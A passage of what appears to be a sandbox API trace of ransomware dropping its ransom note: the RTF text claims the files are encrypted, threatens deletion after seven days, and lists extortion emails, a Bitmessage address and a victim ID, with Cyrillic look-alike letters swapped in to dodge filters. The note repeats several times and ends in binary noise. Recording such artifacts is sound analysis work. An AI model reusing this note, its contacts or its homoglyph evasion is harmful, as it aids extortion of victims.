k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7008, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³ì\x92;g\x82º×P[@/«ub½á¤ØÍ¥þ\x89Ó8", lpUsedDefaultChar=0x0) returned 8717 [0271.618] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef7008*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7008*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.619] CloseHandle (hObject=0x2c8) returned 1 [0271.619] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0271.619] GetLastError () returned 0x2 [0271.619] CreateFileW 